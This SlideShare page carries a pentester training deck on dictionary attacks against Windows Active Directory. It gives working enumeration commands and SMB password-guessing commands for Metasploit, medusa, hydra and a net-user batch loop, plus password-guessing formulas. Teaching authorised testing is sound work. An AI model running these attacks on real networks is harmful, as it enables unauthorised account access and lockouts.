Introduction to Windows Dictionary Attacks
•
3 j'aime•3,961 vues
In this presentation I will cover the basics of how to perform dictionary attacks against Windows Active Directory accounts safely. Below is an overview of the steps that will be covered: Identify domains Enumerate domain controllers Enumerate users from domain controllers Enumerate password policy from domain controllers Perform dictionary attack More security blogs by the authors can be found @ https://www.netspi.com/blog/
Recommandé
Contenu connexe
Tendances
Tendances (20)
En vedette
En vedette (16)
Similaire à Introduction to Windows Dictionary Attacks
Similaire à Introduction to Windows Dictionary Attacks (20)
Plus de Scott Sutherland
Plus de Scott Sutherland (20)
Dernier
Dernier (20)
Introduction to Windows Dictionary Attacks
- 1. Introduction to Windows Dictionary Attacks Author: Scott Sutherland
- 2. Who am I? Scott Sutherland • Principal Security Consultant @ NetSPI • Over 10 years of consulting experience • Security researcher: Blogs, white papers, tools etc
- 3. Presentation Goals • Identify the value of dictionary attacks • Provide new penetration testers with a safe approach to Windows dictionary attacks • Provide security professionals with questions they should be asking their contractors
- 4. Before we begin… Dictionary Attack Brute Force Attack
- 5. Why dictionary attacks? What are the goals? • Identify accounts configured with weak or default passwords – “It’s human nature” • Use accounts as entry points during penetration tests What’s the impact? • Unauthorized access to critical: ‒ Systems ‒ Applications ‒ data • User impersonation
- 6. Are There Alternatives? Yes. Approaches typically includes: • Cracking pw hashes offline with: ‒ Pre-computed hash libraries like Rainbow Tables ‒ Brute force and dictionary techniques using tools like Hashcat and John the Ripper • Dumping clear text passwords for interactive sessions with Mimikatz
- 7. Dictionary Attacks: Process Overview Windows Dictionary Attack Process 1. Identify domains 2. Enumerate domain controllers 3. Enumerate domain users 4. Enumerate domain lockout policy 5. Create a dictionary 6. Perform Attack
- 8. Identify Domains: Methods Unauthenticated Methods • DHCP Information • NetBIOS Queries • DNS Queries • Sniffing Network Traffic • Review RDP drop down lists Authenticated Methods • Review the output of the SET command for “USERDNSDOMAIN” • Review the registry for the default domain
- 9. Identify Domains: Tools Method Tools Auth IPCONFIG DHCP Info No NetBIOS Queries NETSTAT –A <IP> No nmap -sL <IP Range> -oA output_rnds DNS Queries No ./reverseraider -r <IP Range> ./dnswalk victem.com perl fierce.pl -dns <domainname> -threads 5 -file <domainame>-dns.output Wireshark (GUI) + Filter for browser traffic Sniffing No Network Monitor (GUI) Etherape (GUI) nmap –sS –PN –p3389 <IP Range> RDP Drop Down Then visit with RDP client No
- 10. Enumerate DCs: Methods Unauthenticated Methods • DNS Queries • RPC Queries • Port Scanning • NetBIOS Scanning Authenticated Methods • NET GROUP commands • LDAP Queries
- 11. Enumerate DCs: Tools Methods Tools Auth NSLOOKUP –type=SRV _ldap._tcp.<domain> DNS Queries No NLTEST /DCLIST <domain> RPC Queries FindPDC <domain> <request count> No NMAP –sS –p389,636 –PN <IP Range> Port Scanning No FOR /F “tokens=*” %i in (‘type ips.txt’) do NBTSTAT NetBIOS –A %i No Scanning Net group “Domain Controllers” /domain NET GROUP Yes Command LDAP Administrator (GUI Tool) LDAP Queries Yes Hyena (GUI Tool) & adfind -b -sc dcdmp <domain> -gc | grep -i “>name:” No | gawk -F ” ” “{print $2}” | sort | uniq
- 12. Enumerate Domain Users: Methods Unauthenticated Methods • RPC Queries • SID Brute Forcing • SNMP Queries • LDAP Queries • Sharepoint Fuzzing Authenticated Methods • NET USER command • WMI commands
- 13. Enumerate Domain Users: Tools 1 Methods Tools Auth dumpsec.exe /computer=<IP> /rpt=usersonly RPC /saveas=csv /outfile=domain_users.txt Yes Endpoints & enum –N <ip> no enum –U <ip> ruby c:metasploitmsf3msfcli SID Brute auxiliary/scanner/smb/smb_lookupsid Yes Forcing SMBDomain=. MaxRID=10000 RHOSTS=<IP & Address> E > domain_users.txt no Getacct (GUI) ruby c:metasploitmsf3msfcli SNMP auxiliary/scanner/snmp/snmp_enumusers Yes Queries SMBDomain=. RHOSTS=<IP Address> E & Mibbrowser (GUI) no SNMP Walk
- 14. Enumerate Domain Users: Tools 2 Methods Tools Auth adfind -b DC=<victim>,DC=<com> -f LDAP Queries “objectcategory=user” -gc | grep -i Yes “sAMAccountName:” | gawk -F “:” “{print $2}” | gawk & -F ” ” “{print $1}”| sort > domain_users.txt no Fuzz parameters with BURP to enumerate domain Sharepoint users. Example URL below: Yes Fuzzing & https://www.[website].com/sites/[sitename]/_layouts/ userdisp.aspx?Force=True&ID=[2 ] no Net users /domain > domain_users.txt NET USERS Yes Command wmic /user:<user> /password:<password> /node:<IP WMI address> domain_users.txt Yes Commands
- 15. Get Domain Lockout Policy: Methods Unauthenticated Methods • RPC Endpoints Lockout Authenticated Methods threshold: 5 • NET ACCOUNTS Lockout duration: 15 Command Lockout observation What does it all mean? window : 15 • Threshold, duration, and window
- 16. Get Domain Lockout Policy: Tools Methods Tools Auth RPC Queries Enum –P <IP Address> Yes & dumpsec.exe /computer=<IP> /rpt=policy /saveas=csv /outfile=domain_policy.txt No NET ACCOUNTS NET YEs ACCOUNTS COMMAND
- 17. Create a Dictionary: Methods Classics Still Work • Blank • Username as password • password Common Formulas = Most Effective • <Password><Number> • <Companyname><Number> • <Season><Year> • <Sports team>Number> Popular Dictionaries • Metasploit dictionaries • Rock you • FuzzDB • John the ripper
- 18. Create a Dictionary: Tools Dictionary URLs / Lists Blank password Classics Username as password password as password <Password><Number> <Companyname><Number> Formulas <Season><Year> <Sports team>Number> Your Brain! Think of keywords relative to the target company /geographic location and you’ll get more out of your dictionary attacks! http://www.skullsecurity.org/wiki/index.php/Passwords Rockyou http://code.google.com/p/fuzzdb/ FuzzDB https://github.com/rustyrobot/fuzzdb http://www.openwall.com/wordlists/ John the Ripper
- 19. Perform Dictionary Attack: Rules The Rule to Live By: Respect the lockout policy • General idea = Attempt a few passwords for all of the domain users each round, not a 1000 passwords against one user • Subtract 2 attempts from the lockout policy Example: Lockout=5, Attempts=3 • Wait 5 to 10 minutes beyond the observation window
- 20. Perform Dictionary Attack: Tools Tools Commands OS medusa -H hosts.txt -U users.txt -P passwords.txt - Medusa T 20 -t 10 -L -F -M smbnt Linux Easy to use GUI and not CLI that I know of. Bruter Windows ruby c:metasploitmsf3msfcli Metasploit auxiliary/scanner/smb/smb_login THREADS=5 Windows smb_login BLANK_PASSWORDS=true USER_AS_PASS=true and Linux PASS_FILE=c:passwords.txt USER_FILE=c:allusers.txt SMBDomain=. RHOSTS=192.168.1.1 E hydra.exe -L users.txt -P passwords.txt -o Hydra credentials.txt <ip> smb Windows and Linux FOR /F “tokens=*” %a in (‘type passwords.txt’) do Batch Script net user <ip>IPC$ /user:<user> %a Windows
- 21. Conclusions • There is more than one way to do everything! • Enumerate all available options • It’s easy to lockout accounts – respect the password policy • Always ask contractors what their approach is to reduce the chance of account lockouts during penetration tests